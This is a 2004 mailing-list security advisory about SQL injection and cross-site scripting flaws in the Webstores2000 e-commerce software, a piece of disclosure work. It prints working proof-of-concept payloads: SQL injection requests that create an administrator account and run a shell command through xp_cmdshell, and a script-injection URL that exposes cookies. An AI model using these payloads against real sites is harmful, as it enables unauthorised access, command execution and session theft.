Full Disclosure mailing list archives
WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
From: Nick Gudov <cipher () s-quadra com>
Date: Wed, 18 Feb 2004 16:49:10 +0300
S-Quadra Advisory #2004-02-18 Topic: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities Severity: High Vendor URL: http://www.webcortex.com Advisory URL: http://www.s-quadra.com/advisories/Adv-20040218.txt Release date: 18 Feb 2004 1. DESCRIPTIONWebstores2000 is a complete solution for building shopping carts and shopping malls for e-commerce enabled sites. Its written on ASP, works on most Windows platforms
and uses MS Access or MS SQL Server as a backend. Please visit http://www.webcortex.com for information about Webstores2000. 2. DETAILS -- Vulnerability 1: SQL Injection vulnerabilityAn SQL Injection vulnerability has been found in the 'browse_items.asp' script
User supplied input is not filtered before being used in a SQL query. Consequently,
query modification using malformed input is possible.Successfull exploitation of this vulnerability could allow an attacker to gain
administrative access to shopping mall and read any information fromdatabase (i.e. customers private data). Also an attacker could execute arbitrary
commands using xp_cmdshell function. -- Vulnerability 2: Cross Site Scripting vulnerability in 'error.asp'By injecting specially crafted javascript code in url and tricking a user to visit it a remote attacker can steal user session id and gain access to user's personal data.
--PoC code --Vulnerability 1: Platform: MS SQL Server as a backend Posting this data to browse_items.asp creates new administrative account Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%28Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Search_Store.x=0&Search_Store.y=0 Posting this data to browse_items.asp executes 'dir c:' command Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4 -- Vulnerability 2: http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script> 3. FIX INFORMATIONS-Quadra alerted WebCortex development team to this issue on 13th February 2004.
The following response from Shay Sabah has been received: "OK... All of these have been fixed...Now, I ask you to please STOP using our software and making all these "security" emails..."
4. CREDITS Nick Gudov <cipher () s-quadra com> is responsible for discovering this issue. 5. ABOUTS-Quadra offers services in computer security, penetration testing and network assesment, web application security, source code review and third party product vulnerability assesment,
forensic support and reverse engineering. S-Quadra Advisory #2004-02-18 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- WebCortex Webstores2000 version 6.0 multiple security vulnerabilities Nick Gudov (Feb 18)